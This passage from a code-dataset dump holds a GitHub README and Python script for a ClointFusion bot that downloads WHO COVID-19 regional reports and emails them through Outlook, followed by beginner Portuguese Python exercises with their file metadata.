"text": "## WHO COVID-19 Global Region wise Reports Automation.\n---\n\n### Before Note\n\nThis is a simple Robotic Process Automation `RPA` project developed to demonstrate the power of ClointFusion Browser Automation functions. This project is presented at `ClointFusion Monthly Hackathon 9.0.` \n> Check out the Explaination of this BOT in [Youtube](https://youtu.be/6Yjvb6nmf24?t=4630)\n\n### What's this project about?\n\nThis project is a simple automation of downloading Global COVID-19 Regional wise Reports from [WHO](https://www.who.int/) Website using Python Browser Automation.This project is developed mainly using the `ClointFusion`, a Pythton based RPA package.\n\nFor more details on ClointFusion, Please refer [this](https://github.com/clointfusion/clointfusion)\n\n\nThis BOT can do the following\n- Download the Regional Wise Global COVID-19 Image Data.\n- Segregate the Reports Region wise.\n- Zip the reports and mail to the recipient\n\n### PC Requirements\n\n- A Windows/Mac/Linux running PC `Python>=3.8` installed in it.\n- Microsoft Outlook Account\n- Chrome / Firefox browser.\n\n### How to use?\n\n- Make sure You've installed `Python>=3.8` version\n- Clone this Repository.\n```\ngit clone \"https://github.com/fharookshaik/WHO-Covid-19-Global-reports-download-automation\"\n```\n- Install the dependents from `requirements.txt` \n```\npip install -r requirements.txt\n```\n- Fill your Outlook Credentisls in `credentials.json` at mentioned places.\n- Run the python file `main.py`\n\nThat's it. Within few moments BOT will do the task.\n\nThis BOT can scheduled using Task Scheduler as well.\n\n***NOTE: The Credentils will be stored within your system and this BOT do not store by any means. Triple Check the `credentials.json` before share your modified source code to others.***\n\n### BOT Working Video\n\nhttps://user-images.githubusercontent.com/47080241/125203090-8a676080-e294-11eb-9237-fbd5a32ea0ea.mp4\n\n\n## Contribution\n\nGot any bug? / Wanna improve the project?\n\n**Raise an issue or I'll happily accept a PR for new features/bug fixes** \n\n--- \n \n**Having Queries? Feel free to contact me** \n\n<div align=\"center\">\n<a href=\"https://www.linkedin.com/in/fharook-shaik\" target=\"_blank\"><img src=\"https://img.shields.io/badge/LinkedIn-%230077B5.svg?&style=flat-square&logo=linkedin&logoColor=white\" alt=\"LinkedIn\"></a> \n \n<div align=\"center\" width=\"50\">\n\n</div>\n\n \n## Happy Coding !!\n\n\n[](https://forthebadge.com)\n"
},
{
"alpha_fraction": 0.6203305125236511,
"alphanum_fraction": 0.6221358180046082,
"avg_line_length": 34.30392074584961,
"blob_id": "a56bebe6fa5392799634ef60920a001e0991b1ae",
"content_id": "c44fce0b0f2a25bd5f6ec928e552a49dc79ac751",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7201,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 204,
"path": "/main.py",
"repo_name": "fharookshaik/WHO-Covid-19-Global-reports-download-automation",
"src_encoding": "UTF-8",
"text": "# Makesure you've stored the outlook credentials in credentials.json file\n\nimport ClointFusion as cf\nimport os\nimport time\nimport shutil as sh\nimport sys\n\ncf.OFF_semi_automatic_mode()\n\n# GLOBAL vARIABLES\nWORKSPACE_DIR = os.getcwd()\nDOWNLOADS_DIR = os.path.join(WORKSPACE_DIR,'DOWNLOADS')\nREPORTS_DIR = os.path.join(WORKSPACE_DIR,'REGIONAL_REPORTS')\nREPORTS_ZIP = '.'.join([REPORTS_DIR,'zip'])\n\nWHO_LINK = 'http://www.who.int/'\nWHO_COVID_EXPLORER_LINK = 'https://worldhealthorg.shinyapps.io/covid/'\n\nGLOBAL_REGIONS = ['African Region','Region of the Americas','Eastern Mediterranean Region','European Region','South-East Asia Region','Western Pacific Region']\n\ndef instantiate_website():\n browser_state = False\n try:\n browser_state = cf.launch_website_h(URL=WHO_COVID_EXPLORER_LINK,files_download_path=DOWNLOADS_DIR)\n except Exception as e:\n print('Error in instantiate_website = %s' % e)\n finally:\n return browser_state\n\ndef _accept_terms():\n try:\n cf.browser_wait_until_h(text='I ACCEPT')\n time.sleep(2)\n cf.browser_mouse_click_h(User_Visible_Text_Element='I ACCEPT',element='d')\n \n except Exception as e:\n print('Error in accept_terms = ', str(e))\n\ndef _redirect_to_regional_overview():\n try:\n cf.browser_mouse_hover_h(User_Visible_Text_Element='Regional Overview')\n cf.browser_mouse_click_h(User_Visible_Text_Element='Regional Overview',element='d',to_left_of='Country/Area/Territory',to_right_of='Global Overview')\n\n cf.browser_wait_until_h(text='Regional Epidemic Curve')\n\n except Exception as e:\n print('Error in _redirect_to_regional_overview = ' + str(e))\n\ndef _organize_regional_data(option='',type=''):\n time.sleep(2)\n try:\n NEW_FOLDER = os.path.join(REPORTS_DIR,f'{option}')\n \n if not os.path.exists(NEW_FOLDER):\n cf.folder_create(NEW_FOLDER)\n \n files = cf.folder_get_all_filenames_as_list(strFolderPath=DOWNLOADS_DIR)\n # print(files)\n for file in files:\n file_name,ext = file.split('\\\\')[-1].split('.')\n old_file_path = os.path.join(DOWNLOADS_DIR,file)\n if type == 'CASES':\n new_file_name = '.'.join([f'{file_name}_CASES',ext])\n else:\n new_file_name = '.'.join([f'{file_name}_DEATHS',ext])\n \n cf.file_rename(old_file_path=old_file_path, new_file_name=new_file_name,ext=True)\n sh.move(src=os.path.join(DOWNLOADS_DIR,new_file_name),dst=os.path.join(NEW_FOLDER,new_file_name))\n print(f'Moved {new_file_name}')\n\n except Exception as e:\n print('Error in _organize_regional_data = ',str(e))\n sys.exit()\n\ndef _download_regional_cases_data(option=''):\n try:\n cf.browser_mouse_click_h('CASES',element='d')\n cf.browser_mouse_click_h('DOWNLOAD PLOT',element='d',)\n _organize_regional_data(option,type='CASES')\n\n except Exception as e:\n print('Error in _download_regional_cases_data = ',str(e))\n\ndef _download_regional_deaths_data(option=''):\n try:\n cf.browser_mouse_click_h('DEATHS',element='d')\n cf.browser_mouse_click_h('DOWNLOAD PLOT',element='d')\n _organize_regional_data(option,type='DEATHS')\n\n\n except Exception as e:\n print('Error in _download_regional_deaths_data = ',str(e))\n\ndef download_regional_overview_reports():\n try:\n _redirect_to_regional_overview()\n \n for option in GLOBAL_REGIONS:\n if option == 'African Region':\n prev_option = option\n \n else:\n prev_option = GLOBAL_REGIONS[GLOBAL_REGIONS.index(option) - 1]\n \n cf.browser_mouse_click_h(prev_option,element='d')\n cf.browser_mouse_click_h(option,element='d')\n time.sleep(2)\n\n _download_regional_cases_data(option)\n _download_regional_deaths_data(option)\n time.sleep(2)\n\n except Exception as e:\n print('Error in download_regional_overview_reports = ',str(e))\n\ndef zip_reports_dir():\n try:\n base = os.path.basename(REPORTS_ZIP)\n name,format = base.split('.')\n archive_from = os.path.dirname(REPORTS_DIR)\n archive_to = os.path.basename(REPORTS_DIR.strip(os.sep))\n sh.make_archive(name,format, archive_from,archive_to)\n \n except Exception as e:\n print('Error in _zip_reports_dir = ',str(e))\n\ndef send_outlook_email():\n try:\n CREDENTIALS_JSON = os.path.join(WORKSPACE_DIR,'credentials.json')\n outlook_details = cf.file_get_json_details(path_of_json_file=CREDENTIALS_JSON,section='Outlook')\n outlook_username = outlook_details.get('username')\n outlook_password = outlook_details.get('password')\n\n cf.browser_navigate_h('outlook.com')\n cf.browser_mouse_click_h('Sign in',element='d')\n\n cf.browser_write_h(outlook_username,User_Visible_Text_Element='Email, phone, or Skype')\n cf.browser_mouse_click_h('Next',element='d')\n\n cf.browser_write_h(outlook_password,User_Visible_Text_Element='Password')\n cf.browser_mouse_click_h('Sign in',element='d')\n\n cf.browser_mouse_click_h('New message',element='d')\n\n time.sleep(2)\n to_email = cf.gui_get_any_input_from_user('Enter to email: ')\n cf.browser_write_h(to_email,User_Visible_Text_Element='To')\n\n cf.browser_write_h('WHO COVID-19 Global Regional Reports',User_Visible_Text_Element='Add a subject')\n\n body_elem = cf.browser_locate_element_h(\"//*[@aria-label='Message body']\")\n cf.browser_write_h('Please find the attached Reports.\\n\\n\\nThanks & Regards\\nWHO COVID-19 BOT',User_Visible_Text_Element=body_elem)\n\n cf.browser_mouse_click_h(User_Visible_Text_Element='Attach',element='d')\n cf.browser_mouse_click_h(User_Visible_Text_Element='Browse this computer',element='d')\n cf.key_write_enter(strMsg=REPORTS_ZIP)\n\n time.sleep(5)\n\n cf.browser_mouse_click_h('Send',element='d')\n\n except Exception as e:\n print('Error in Sending Outlook Email = ',str(e))\n\n\nif __name__ == '__main__':\n try:\n # Emptying Previous Download Files\n if not os.path.exists(DOWNLOADS_DIR):\n cf.folder_create(strFolderPath=DOWNLOADS_DIR)\n else:\n cf.folder_delete_all_files(DOWNLOADS_DIR)\n \n # Removing REPORTS.zip\n if os.path.exists(REPORTS_ZIP):\n os.remove(REPORTS_ZIP)\n\n # Creating Reports Folder\n if not os.path.exists(REPORTS_DIR):\n cf.folder_create(REPORTS_DIR)\n else:\n cf.folder_delete_all_files(REPORTS_DIR)\n\n browser_state = instantiate_website()\n\n if browser_state == True:\n # Accept Terms & Conditions\n _accept_terms()\n\n # Downloading Regional Overview Reports\n download_regional_overview_reports()\n\n # Zip the Downloaded Reports\n zip_reports_dir()\n\n # Send Gmail\n send_outlook_email()\n\n time.sleep(5)\n cf.browser_quit_h()\n\n except Exception as e:\n print('Exception Raised = ', str(e))"
}
] | 2 |
ToninALV/Curso-em-video-Python
|
https://github.com/ToninALV/Curso-em-video-Python
|
4ae240e474ecf97aab3b232e13d62061472a36eb
|
7a9f81ba103995e9b6bb673e78aaa35649225767
|
6fc23790786e748c2aa9fb5f13c6ec7cace45e4c
|
refs/heads/main
| 2023-03-27T18:24:16.140566 | 2021-03-30T09:53:22 | 2021-03-30T09:53:22 | 342,245,673 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5899280309677124,
"alphanum_fraction": 0.6402877569198608,
"avg_line_length": 25.399999618530273,
"blob_id": "2ac4168a98300389664417fd73e6a691c243766d",
"content_id": "dba1150f6086c6d5f2d228a1ecadd51abbe95559",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 5,
"path": "/ex007.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "n1=float(input('Digite sua 1° nota: '))\r\nn2=float(input('Digite sua 2° nota: '))\r\nsoma=n1+n2\r\nmedia=soma/2\r\nprint('Sua média é' ,media)\r\n\r\n"
},
{
"alpha_fraction": 0.6797385811805725,
"alphanum_fraction": 0.6819171905517578,
"avg_line_length": 49,
"blob_id": "76837c3599633b6bbbef097204237654398b4bb5",
"content_id": "5ade72c1203fee38239172e3b492a388505d7812",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 468,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 9,
"path": "/ex053.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "texto = str(input('Digite uma frase: '))\r\n\r\ntexto_sem_espaços = texto.replace(' ', '')\r\ntext_todo_minusculo = texto_sem_espaços.lower()\r\ntexto_invertido = text_todo_minusculo[::-1]\r\nif texto_invertido == text_todo_minusculo:\r\n print('A frase {} de trás pra frente é {}, por isso ela é um palindromo.'.format(texto, texto_invertido))\r\nelse:\r\n print('A frase {} de trás pra frente é {}, por isso ela NÃO é um palindromo.'.format(texto, texto_invertido))\r\n"
},
{
"alpha_fraction": 0.5170630812644958,
"alphanum_fraction": 0.5346432328224182,
"avg_line_length": 28.15625,
"blob_id": "af9f93a5bf95d0709e27b5413e7eb397423d2081",
"content_id": "b68500ca96fcd19dc7d3cff2cce5803839147520",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 975,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 32,
"path": "/ex070.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "\r\nmaisdemil = 0\r\ntotalgasto = 0\r\nmaisbarato = 0\r\ncont = 0\r\nbarato = ''\r\nwhile True:\r\n produto = str(input('Digite aqui o nome do Produto: '))\r\n valor = float(input('Digite aqui o valor deste produto: R$'))\r\n opção = str(input('Deseja adicionar mais produtos? [S/N]: ')).upper()\r\n cont += 1\r\n totalgasto += valor\r\n if valor > 1000:\r\n maisdemil += 1\r\n if cont == 1:\r\n maisbarato = valor\r\n barato = produto\r\n else:\r\n if valor < maisbarato:\r\n maisbarato = valor\r\n barato = produto\r\n resp = ' '\r\n print('')\r\n if opção == 'S':\r\n pass\r\n\r\n elif opção == 'N':\r\n totalgasto += valor\r\n print('')\r\n print('O Valor Total da compra é R${:.2f}'.format(totalgasto))\r\n print('Custaram mais de R$1.000, {} produtos.'.format(maisdemil))\r\n print('O produto mais barato foi {} e seu valor é de R${:.2f}'.format(barato, maisbarato))\r\n break\r\n"
},
{
"alpha_fraction": 0.6408911943435669,
"alphanum_fraction": 0.6605504751205444,
"avg_line_length": 37.94736862182617,
"blob_id": "8d502e182ba70a8dbb2ec4598dc5c026e972ece4",
"content_id": "9883accb697ac59342561030bb2301a0e4cbc9db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 772,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 19,
"path": "/ex058.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "from random import randint\r\ntotpalpitemais = 0\r\ntotpalpitemenos = 0\r\nprint('-=-' *20)\r\nprint(' Irei pensar em um número entre 0 e 10. Tente Adivinhar')\r\nprint('-=-' *20)\r\nprint('')\r\npalpite = int(input('Qual número você acha que é ? '))\r\ncomputador = randint(0, 10)\r\nwhile not palpite == computador:\r\n if palpite > computador:\r\n palpite = int(input('Muito Alto, Tente novamente: '))\r\n totpalpitemais += 1\r\n if palpite < computador:\r\n palpite = int(input('Muito baixo, Tente novamente: '))\r\n totpalpitemenos += 1\r\n\r\nprint('Parabéns o número que o computador pensou é {}...'.format(computador))\r\nprint('Foi necessário um total de {} Tentativas, para que você pudesse acertar.'.format(totpalpitemais + totpalpitemenos + 1))\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5479999780654907,
"alphanum_fraction": 0.5799999833106995,
"avg_line_length": 25.77777862548828,
"blob_id": "e5fda20cc03064b00031fc3f79e90c2a6ba1ef97",
"content_id": "91cc96490cd835b8156c0b6cb9178dfebce81ce6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 253,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 9,
"path": "/ex066.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "qtdvalores = soma = 0\r\n\r\nwhile True:\r\n n = int(input('Digite um número. [999 para parar]: '))\r\n if n == 999:\r\n break\r\n qtdvalores += 1\r\n soma += n\r\nprint(f'Você digitou um total de {qtdvalores} valores, e a soma deles é {soma}.')\r\n"
},
{
"alpha_fraction": 0.57485032081604,
"alphanum_fraction": 0.5808383226394653,
"avg_line_length": 26.60869598388672,
"blob_id": "8886585ea7a5fbb89343b7ba46c192cfb1d85430",
"content_id": "58ef44f16984d1c43deaf3f304271404cfd7bd54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 679,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 23,
"path": "/ex065.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "\r\n\r\nopção = 'S'\r\nqtdvalores = somavalores = maiorvalor = menorvalor = 0\r\n\r\n\r\n\r\nwhile opção in 'S':\r\n n = int(input('Digite um número: '))\r\n qtdvalores += 1\r\n somavalores += n\r\n if qtdvalores == 1:\r\n maiorvalor = menorvalor = n\r\n\r\n else:\r\n if n > maiorvalor:\r\n maiorvalor = n\r\n if n < menorvalor:\r\n menorvalor = n\r\n opção = str(input('Quer Continuar ? [S/N]: ')).upper()\r\n\r\nmedia = somavalores / qtdvalores\r\n\r\nprint('Você digitou um total de {} valores, e a média entre eles é {:.2f}'.format(qtdvalores, media))\r\nprint('O Maior número digitado foi {} e o Menor foi {}'.format(maiorvalor, menorvalor))\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.6435185074806213,
"avg_line_length": 21.77777862548828,
"blob_id": "d28705ffafe1fdd19ba3dc7f5080c34991b31db1",
"content_id": "24b2caac5a110bd680809e03a429ff449f4de46f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 217,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 9,
"path": "/ex023.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "num = str(input('Digite um número: '))\r\nunidade = num[1]\r\ndezena = num[0]\r\ncentena = num[2]\r\nmilhar = num[3]\r\nprint('unidade', unidade)\r\nprint('dezena', dezena)\r\nprint('centena' ,centena)\r\nprint('milhar' ,milhar)\r\n\r\n"
},
{
"alpha_fraction": 0.521276593208313,
"alphanum_fraction": 0.563829779624939,
"avg_line_length": 16.799999237060547,
"blob_id": "6fae7a31c1e65b70a1aff0682a219c27ff4d981f",
"content_id": "167a7c45c649fd8617d2b0ed77747b16bf0dedf7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 5,
"path": "/ex047.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "import math\r\n\r\nfor valor in range(0, 51, 2):\r\n print(valor, end=' ')\r\nprint('ACABOU')\r\n"
},
{
"alpha_fraction": 0.6089965105056763,
"alphanum_fraction": 0.6089965105056763,
"avg_line_length": 39.28571319580078,
"blob_id": "16e0ba075b7efda624b6af25a1327a2c2cbc8b19",
"content_id": "3d88a8cd4ccbf2950d13c7e2bddc87de35e48f6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 294,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 7,
"path": "/ex057.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "sexo = str(input('Informe o seu Sexo: [M/F]')).upper()\r\nwhile sexo not in 'MF':\r\n sexo = str(input('Dados inválidos. Tente Novamente! [M/F] ')).upper()\r\nif sexo == 'M':\r\n print('Você é do sexo Masculino, Correto?')\r\nelif sexo == 'F':\r\n print('Você é so dexo Feminino, Correto?')\r\n"
},
{
"alpha_fraction": 0.447429895401001,
"alphanum_fraction": 0.519859790802002,
"avg_line_length": 19,
"blob_id": "24a7404e07d98b832f99175b8c37e4fd8972be84",
"content_id": "b77c19be496d447648c21f92e11158ed2b3cface",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 881,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 40,
"path": "/ex059.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "print('\\033[36m-=-' * 10)\r\nprint('\\033[1;97m CALCULADORA PROGRAMAVEL')\r\nprint('\\033[36m-=-' * 10)\r\nprint('')\r\nn1 = int(input('Digite um número: '))\r\nn2 = int(input('Digite outro número: '))\r\n\r\nprint(\"\"\"\\033[1;97m\r\n[1] Somar\r\n[2] Subtrair\r\n[3] Multiplicação\r\n[4] Divisão\r\n[5] Trocar os números\r\n[6] Sair do Programa\r\n\"\"\")\r\n\r\nopção = int(input('\\033[36mQual vai ser sua opção ?'))\r\n\r\n\r\nif opção == 1:\r\n print('A soma de {} + {} = {}'.format(n1, n2, (n1 + n2)))\r\n\r\n\r\nif opção == 2:\r\n print('O Resultado de {} - {} = {}'.format(n1, n2, (n1 - n2)))\r\n\r\n\r\nif opção == 3:\r\n print('O Produto de {} * {} = {}'.format(n1, n2, (n1 * n2)))\r\n\r\n\r\nif opção == 4:\r\n print('O Quociente de {} / {} = {}'.format(n1, n2, (n1/n2)))\r\n\r\nwhile opção != 5:\r\n if opção == 5:\r\n\r\n\r\nif opção == 6:\r\n print('Você decifiu fechar o programa. ADEUS!')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5055986046791077,
"alphanum_fraction": 0.6007751822471619,
"avg_line_length": 30.27777862548828,
"blob_id": "a6260aff3f3c3dc9118ca0dbd9d9bdb192a18f2d",
"content_id": "f4508ca8081025a073ff70c6b9f50815c2ddd99e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2324,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 72,
"path": "/ex045.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "import random\r\nimport time\r\n\r\nprint('\\033[1;31m{:=^40}'.format(' JOKENPO \\033[1;31m'))\r\nprint(\"\"\"\\033[1;36m\r\n[0] PEDRA\r\n[1] PAPEL\r\n[2] TESOURA\r\n \"\"\")\r\ncomputador = random.randint(0, 2)\r\nprint('')\r\njogador = int(input('\\033[1;97mEscolha uma das opções: '))\r\nprint('')\r\ntime.sleep(0.2)\r\nprint('\\033[1;95mJO')\r\ntime.sleep(0.5)\r\nprint('\\033[1;94mKEN')\r\ntime.sleep(0.5)\r\nprint('\\033[1;93mPO')\r\nprint('')\r\nitens = ('PEDRA', 'PAPEL', 'TESOURA')\r\nprint('\\033[1;97m-=-'*11)\r\nprint('Computador jogou {}'.format(itens[computador]))\r\nprint('Jogador jogou {}'.format(itens[jogador]))\r\nprint('-=-'*11)\r\nprint('')\r\nif computador == 0: # Computador jogou PEDRA\r\n if jogador == 0: # Jogador jogou PEDRA\r\n print('\\033[1;33m EMPATE')\r\n print('\\033[0;97m{} = {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\n elif jogador == 1: # Jogador jogou PAPEL\r\n print('\\033[1;97mJogador \\033[1;92m\\033[1;31mVENCEU')\r\n print('\\033[0;97m{} < {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\n elif jogador == 2: # jogador jogou TESOURA\r\n print('\\033[0;97mComputador \\033[1;31mVENCEU')\r\n print('\\033[0;97m{} > {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\nelif computador == 1: #Computador jogou PAPEL\r\n if jogador == 0:# Jogador jogou PEDRA\r\n print('\\033[0;97mComputador \\033[1;31mVENCEU')\r\n print('{} > {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\n elif jogador == 1:# Jogador jogou PAPEL\r\n print('\\033[0;33mEMPATE')\r\n print('\\033[0;97m{} = {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\n elif jogador == 2:# jogador jogou TESOURA\r\n print('\\033[0;97mJogador \\033[1;31mVENCEU')\r\n print('\\033[0;97m{} < {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\nelif computador == 2: #Computador jogou TESOURA\r\n if jogador == 0:# Jogador jogou PEDRA\r\n print('\\033[0;97mJogador \\033[1;31mVENCEU')\r\n print('\\033[0;97m{} < {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\n elif jogador == 1:# Jogador jogou PAPEL\r\n print('\\033[0;31mComputador \\033[1;31mVENCEU')\r\n print('\\033[0;97m{} > {}'.format(itens[computador], itens[jogador]))\r\n\r\n\r\n elif jogador == 2:# jogador jogou TESOURA\r\n print('\\033[1;33mEMPATE')\r\n print('\\033[0;97m{} = {}'.format(itens[computador], itens[jogador]))"
},
{
"alpha_fraction": 0.5119616985321045,
"alphanum_fraction": 0.5645933151245117,
"avg_line_length": 25.85714340209961,
"blob_id": "483ffd542001e25a66055341bffa86fc8f383a12",
"content_id": "d4dcd26162b1d43755092e28cb07d5a841dc2657",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 213,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 7,
"path": "/ex006.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "n1=int(input('Digite um número '))\r\ndois=n1*2\r\ntriplo=n1*3\r\nraiz=n1**(1/2)\r\nprint('O Dobro de' ,n1, 'é' ,dois)\r\nprint('O Triplo de' ,n1, 'é' ,triplo)\r\nprint('A raiz Quadrada de' ,n1, 'é' ,raiz)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5950000286102295,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 30.33333396911621,
"blob_id": "10267a89c43f57ee3d28e42ee9a8200d17b8c043",
"content_id": "449e6475957960d6af6896085e5a1eb7812bf06f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 200,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 6,
"path": "/ex025.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "nome = str(input('Digite seu nome: '))\r\n#split = nome.split(\" \")[0].lower()\r\n#silva = 'silva' == split\r\nsilva = 'silva' in nome.lower()\r\nprint('Olhando se seu nome tem silva...')\r\nprint(silva)\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.4482758641242981,
"alphanum_fraction": 0.6081504821777344,
"avg_line_length": 19,
"blob_id": "2b075fc4a0f4187846f93af63881a12fd5d0ff94",
"content_id": "e0c06d07740e475a457ce7911ee83d6089ae4644",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 319,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 15,
"path": "/ex046.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "import time\r\n\r\nfor c in range(10, -1, -1):\r\n print('\\033[1;97m{}'.format(c))\r\n time.sleep(1)\r\nprint('\\033[1;31mKABUM')\r\ntime.sleep(0.5)\r\nprint('\\033[1;32mKABUM')\r\ntime.sleep(0.5)\r\nprint('\\033[1;33mKABUM')\r\ntime.sleep(0.5)\r\nprint('\\033[1;97mKABUM')\r\ntime.sleep(0.5)\r\nprint('\\033[1;36mKABUM')\r\ntime.sleep(0.5)\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5744680762290955,
"alphanum_fraction": 0.6003039479255676,
"avg_line_length": 26.434782028198242,
"blob_id": "d1c2292056528024beef42195260ea891927a57b",
"content_id": "c7ceaf5c28de1b4be46a359d45375e42cae74e43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 670,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 23,
"path": "/ex037.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "n1 = int(input('Digite um número para ser convertido: '))\r\nprint(' ')\r\nprint('Escolha qual vai ser a base da conversão')\r\nprint(' ')\r\nprint('[ 1 ] converter para BINARIO')\r\nprint('[ 2 ] converter para OCTAL')\r\nprint('[ 3 ] converter para HEXADECIMAL')\r\nprint(' ')\r\nop1 = int(input('Qual é a base da conversão ?'))\r\n\r\nif op1 == 1:\r\n bin = bin(n1)\r\n print('Este número em BINARIO é {}'.format(bin[2:]))\r\n\r\nelif op1 == 2:\r\n oct = oct(n1)\r\n print('Este número em OCTAL é {}'.format(oct[2:]))\r\n\r\nelif op1 == 3:\r\n hex = hex(n1)\r\n print('Este número em HEXADECIMAL é {}'.format(hex[2:]))\r\nelse:\r\n print('Opção Invalida. Tente novamente.')\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.521327018737793,
"alphanum_fraction": 0.5308057069778442,
"avg_line_length": 16.700000762939453,
"blob_id": "47aad3a7fcaba5c8bbff8537f9c095a0e409455c",
"content_id": "17aa7c746f65506ae98d322881aae20a728f64ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 216,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 10,
"path": "/ex030.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "\r\nnumber = float(input('Digite um número Qualquer: '))\r\n\r\nparimpar = (number % 2)\r\n\r\nif parimpar == 0:\r\n print('Este é um número PAR ')\r\n\r\n\r\nelse:\r\n print('Este é um número IMPAR ')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.4739583432674408,
"alphanum_fraction": 0.515625,
"avg_line_length": 29.33333396911621,
"blob_id": "d9566329576d905a9b2fb51ca28dd91bce0ce1d8",
"content_id": "93b94f61a1e63b12554e7363b87fe52d52470e5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 196,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 6,
"path": "/ex050.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "soma = 0\r\nfor n in range(1, 7):\r\n n1 = int(input('Digite o {}° número: '.format(n)))\r\n if n1 % 2 == 0:\r\n soma = soma + n1\r\nprint('A soma dos número pares é {}'.format(soma))\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.4763779640197754,
"alphanum_fraction": 0.5610235929489136,
"avg_line_length": 19.7391300201416,
"blob_id": "ffa09481af7327b1a1ea1615931b959dced6d76f",
"content_id": "2c58b87ceafdcc51967682ccdb3b8e08d987b017",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 511,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 23,
"path": "/ex009.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
